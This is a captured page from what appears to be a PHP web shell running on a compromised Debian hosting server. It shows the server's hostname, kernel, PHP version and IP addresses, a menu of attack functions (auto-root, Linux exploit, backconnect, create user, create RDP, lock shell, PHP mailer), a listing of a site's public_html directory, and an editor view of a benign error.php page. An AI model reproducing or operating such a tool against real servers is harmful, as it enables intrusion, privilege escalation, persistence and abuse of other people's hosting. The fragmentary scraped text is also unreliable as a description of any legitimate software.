Linux webserver.lcwhost.net 5.10.0-12-amd64 #1 SMP Debian 5.10.103-1 (2022-03-07) x86_64
LiteSpeed
: 194.163.130.72 | : 216.73.216.224
Cant Read [ /etc/named.conf ]
7.4.33
admin
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
admin /
domains /
lcwhost.org /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
api
[ DIR ]
drwxr-xr-x
applications
[ DIR ]
drwxr-xr-x
datastore
[ DIR ]
drwxr-xr-x
oauth
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
static
[ DIR ]
drwxr-xr-x
system
[ DIR ]
drwxr-xr-x
uploads
[ DIR ]
drwxr-xr-x
.htaccess
305
B
-rw-r--r--
404error.php
180
B
-rw-r--r--
Credits.txt
13.12
KB
-rw-r--r--
conf_global.dist.php
0
B
-rw-r--r--
conf_global.php
457
B
-rw-r--r--
docs.html
223
B
-rw-r--r--
error.php
1.46
KB
-rw-r--r--
index.php
445
B
-rw-r--r--
init.php
40.21
KB
-rw-r--r--
sitemap.php
749
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : error.php
<!DOCTYPE html> <html lang="en" data-server-ip="<?php echo $_SERVER['SERVER_ADDR'] ?? ( $_SERVER['LOCAL_ADDR'] ?? 'unavailable' ); ?>"> <head> <title>Error</title> <style type='text/css'> body { background: #f9f9f9; margin: 0; padding: 30px 20px; font-family: "Helvetica Neue", helvetica, arial, sans-serif; } #error { max-width: 800px; background: #fff; margin: 0 auto; } h1 { background: #151515; color: #fff; font-size: 22px; font-weight: 500; padding: 10px; } h1 span { color: #7a7a7a; font-size: 14px; font-weight: normal; } #content { padding: 20px; line-height: 1.6; } #reload_button { background: #151515; color: #fff; border: 0; line-height: 34px; padding: 0 15px; font-family: "Helvetica Neue", helvetica, arial, sans-serif; font-size: 14px; border-radius: 3px; } </style> </head> <body> <div id='error'> <h1>An error occurred <span>(500 Error)</span></h1> <div id='content'> We're sorry, but a temporary technical error has occurred which means we cannot display this site right now. <br><br> <?php if ( isset( $message ) and $message ): ?> <em><?php echo $message; ?></em><br><br> <?php endif; ?> You can try again by clicking the button below, or try again later. <br><br> <button onclick="window.location.reload();" id='reload_button'>Try again</button> </div> </div> </body> </html>
Close